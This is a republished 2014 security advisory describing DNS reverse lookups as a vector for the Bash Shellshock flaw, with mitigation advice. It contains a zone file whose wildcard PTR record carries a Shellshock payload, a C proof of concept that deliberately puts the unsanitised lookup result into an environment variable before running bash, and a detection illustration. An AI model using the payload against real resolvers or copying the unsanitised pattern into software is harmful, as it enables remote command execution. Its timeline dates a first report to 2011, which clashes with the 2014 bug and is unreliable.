DNS Reverse Lookup Shellshock Exploit
Source: vfocus.net   Author: Dirk-Willem   Published: 2014-10-15
DNS Reverse Lookup as a vector for the Bash vulnerability (CVE-2014-6271 et al.)
  
                       CVE-2014-3671
  
references:
     CVE-2014-6271, CVE-2014-7169, CVE-2014-6277, CVE-2014-6278 
     CVE-2014-7186 and, CVE-2014-7187
  
* Summary:
  
The CVEs above detail a number of flaws in bash related to the parsing
of environment variables (aka BashBug, Shellshock). Several networked
vectors for triggering this bug have been discovered, such as through
DHCP options and CGI environment variables in webservers [1].
  
This document advises you of an additional vector: a reverse lookup
in DNS, where the result of this lookup is passed, unsanitised, into
an environment variable (e.g. as part of a batch process).
  
This vector is subtly different from a normal attack vector: the
attacker can 'sit back' and let a (legitimate) user trigger the
issue, hence keeping the footprint for an IDS or WAAS to act on small.
  
* Resolvers/systems affected:
  
At the time of writing, the stock resolver (in combination with the libc
library) of OSX 10.9 (all versions) and 10.10/R2 is the only known
standard installation that passes the bash exploit string back, unescaped,
to callers of getnameinfo().
  
That means that UNpatched systems are vulnerable through this vector
PRIOR to the bash update documented in http://support.apple.com/kb/DL1769.
  
Most other OSes (e.g. RHEL6, CentOS, FreeBSD 7 and up) seem unaffected
in their stock install: libc/libresolv and DNS use different escaping
mechanisms (octal vs. decimal), and the name handed back to the caller
is in escaped presentation form, so the "() {" prefix that bash matches
on when importing functions from the environment does not arrive intact.
  
We are currently investigating a number of async DNS resolvers that
are commonly used in DB cache/speed-optimising products and
application-level/embedded firewall systems.
  
Versions affected: 
  
See above CVEs as your primary source.
  
* Resolution and Mitigation:
  
In addition to the mitigations listed in the above CVEs, IDSes and similar
systems may be configured to parse DNS traffic in order to spot the
offending strings in PTR answers before they reach a resolver.
  
Also note that Apple DL1769 addresses the bash issue, NOT the vector
through the resolver.
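The following is an added illustration, written for this page and not the advisory author's code, of the two points above: why a resolver that escapes the looked-up name is not a usable vector, and what an IDS rule would match on in the raw PTR data. The decoder renders a PTR answer's wire-format name the way a BIND-derived libresolv does (zone-file metacharacters backslashed, bytes outside 0x21..0x7e written as \DDD decimal); it is a re-implementation modelled on ns_name_ntop(), not the library's own code. The prefix test is the four-byte "() {" check that pre-patch bash applied to environment values. The sample wire bytes are constructed here from the payload in the zone file below.

```c
#include <stdio.h>
#include <string.h>

/* Zone-file metacharacters that a BIND-derived libresolv (ns_name_ntop)
 * escapes with a backslash when rendering a DNS name as text. */
static int dns_special(unsigned char c) {
    switch (c) {
    case '"': case '.': case ';': case '\\':
    case '(': case ')': case '@': case '$':
        return 1;
    default:
        return 0;
    }
}

/* Render one raw DNS label (the bytes carried in PTR RDATA) to presentation
 * form: metacharacters get a backslash, anything outside 0x21..0x7e (space
 * included) becomes \DDD in decimal. Returns the length written, or -1 if
 * dst is too small. Re-implementation for this example, not libresolv's code. */
int dns_escape_label(const unsigned char *src, size_t srclen,
                     char *dst, size_t dstsz) {
    size_t o = 0;
    if (dstsz == 0) return -1;
    for (size_t i = 0; i < srclen; i++) {
        unsigned char c = src[i];
        if (dns_special(c)) {
            if (o + 2 >= dstsz) return -1;
            dst[o++] = '\\';
            dst[o++] = (char)c;
        } else if (c <= 0x20 || c >= 0x7f) {
            if (o + 4 >= dstsz) return -1;
            dst[o++] = '\\';
            dst[o++] = (char)('0' + c / 100);
            dst[o++] = (char)('0' + (c % 100) / 10);
            dst[o++] = (char)('0' + c % 10);
        } else {
            if (o + 1 >= dstsz) return -1;
            dst[o++] = (char)c;
        }
    }
    dst[o] = '\0';
    return (int)o;
}

/* Decode an uncompressed wire-format name (length-prefixed labels, zero
 * terminator) into escaped dotted text. Compression pointers are rejected;
 * the PTR target in the test zone is a single literal label anyway. */
int dns_wire_to_text(const unsigned char *wire, size_t wirelen,
                     char *dst, size_t dstsz) {
    size_t i = 0, o = 0;
    while (i < wirelen) {
        unsigned char len = wire[i++];
        if (len == 0) {                       /* root label: end of name */
            if (o >= dstsz) return -1;
            dst[o] = '\0';
            return (int)o;
        }
        if (len & 0xC0) return -1;            /* compression pointer */
        if (i + len > wirelen) return -1;     /* truncated label */
        if (o > 0) {
            if (o + 1 >= dstsz) return -1;
            dst[o++] = '.';
        }
        int n = dns_escape_label(wire + i, len, dst + o, dstsz - o);
        if (n < 0) return -1;
        o += (size_t)n;
        i += len;
    }
    return -1;                                /* no terminator seen */
}

/* Pre-patch bash imported any environment value beginning with "() {" as a
 * function definition and kept parsing past the closing brace. This 4-byte
 * prefix test is what an IDS rule would apply to raw PTR RDATA. */
int shellshock_prefix(const char *value) {
    return strncmp(value, "() {", 4) == 0;
}

/* Constructed sample: wire form of the payload from the zone file, as it
 * would appear in the RDATA of the PTR answer (0x13 = one 19-byte label). */
static const unsigned char ptr_wire[] = "\x13" "() { :;}; echo RDNS" "\x00";
/* Constructed benign name for comparison. */
static const unsigned char host_wire[] = "\x03" "www" "\x07" "example" "\x03" "com" "\x00";

int main(void) {
    char text[256];
    const char *raw = (const char *)ptr_wire + 1;   /* label bytes, NUL-terminated */

    dns_wire_to_text(ptr_wire, sizeof ptr_wire - 1, text, sizeof text);
    printf("raw label   : %s  -> bash prefix match: %d\n", raw, shellshock_prefix(raw));
    printf("escaped name: %s  -> bash prefix match: %d\n", text, shellshock_prefix(text));

    dns_wire_to_text(host_wire, sizeof host_wire - 1, text, sizeof text);
    printf("benign name : %s\n", text);
    return 0;
}
```

The escaped form starts with `\(\)\032{`, so a libc that hands that to the application never satisfies the bash prefix check; a detector therefore has to look at the raw label bytes on the wire (or in the zone), not at what a well-behaved resolver returns.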
  
* Reproducing the flaw:
  
A simple zone file such as:
  
     $TTL 10;
     $ORIGIN in-addr.arpa.
     @     IN SOA     ns.boem.wleiden.net dirkx.webweaving.org (
                    666        ; serial
                    360 180 3600 1800 ; very short lifespan.
                    )
     IN          NS     127.0.0.1
     *           PTR      "() { :;}; echo CVE-2014-6271, CVE-2014-7169, RDNS" 
  
can be used to create an environment in which to test the issue (the
wildcard PTR answers every reverse lookup under in-addr.arpa with the
payload, so any address resolves to it), either with existing code or
with the following trivial example:
  
    #include <sys/socket.h>
    #include <netdb.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    /* Reverse-resolve the IPv4 address given on the command line, export the
     * resulting name unsanitised as REMOTE_HOST, and exec bash. Against the
     * zone above, an unpatched bash behind a resolver that does not escape
     * the name runs the function body planted in the PTR record on startup. */
    int main(int argc, char **argv) {
     struct sockaddr_in sa;
     char host[NI_MAXHOST];

     if (argc != 2) {
      fprintf(stderr, "usage: %s <ipv4-address>\n", argv[0]);
      return 1;
     }

     memset(&sa, 0, sizeof sa);
     sa.sin_family = AF_INET;
    #if defined(__APPLE__) || defined(__FreeBSD__)
     sa.sin_len = sizeof sa;          /* BSD-derived libc checks sa_len */
    #endif
     if (inet_aton(argv[1], &sa.sin_addr) != 1) {
      fprintf(stderr, "not an IPv4 address: %s\n", argv[1]);
      return 1;
     }

     /* NI_NAMEREQD: fail rather than fall back to the numeric address. */
     int rc = getnameinfo((struct sockaddr *)&sa, sizeof sa,
          host, sizeof host, NULL, 0, NI_NAMEREQD);
     if (rc != 0) {
      fprintf(stderr, "getnameinfo: %s\n", gai_strerror(rc));
      return 1;
     }

     printf("Lookup result: %s\n\n", host);

     /* Deliberately no sanitising: this is the vector under test. */
     if (setenv("REMOTE_HOST", host, 1) != 0) {
      perror("setenv");
      return 1;
     }
     /* execl() needs an argv[0] and a NULL terminator for the argument list. */
     execl("/bin/bash", "bash", (char *)NULL);
     perror("execl");
     return 1;
    }
  
  
* Credits and timeline:
  
The flaw was found and reported by Stephane Chazelas (see CVE-2014-6271
for details). Dirk-Willem van Gulik (dirkx(at)webweaving.org) found
the DNS reverse lookup vector.
  
09-04-2011     first reported.
2011, 2014     issue verified on various embedded/firewall/WAAS
               systems and reported to vendors.
??-09-2014     Apple-specific exploit seen.
11-10-2014     Apple confirms that, with DL1769 in place,
               "The issue that remains, while it raises
               interesting questions, is not a security
               issue in and of itself."
  
* Common Vulnerability Scoring (Version 2) and vector:
  
See CVE-2014-6271.
  
[1] https://github.com/mubix/shellshocker-pocs/blob/master/README.md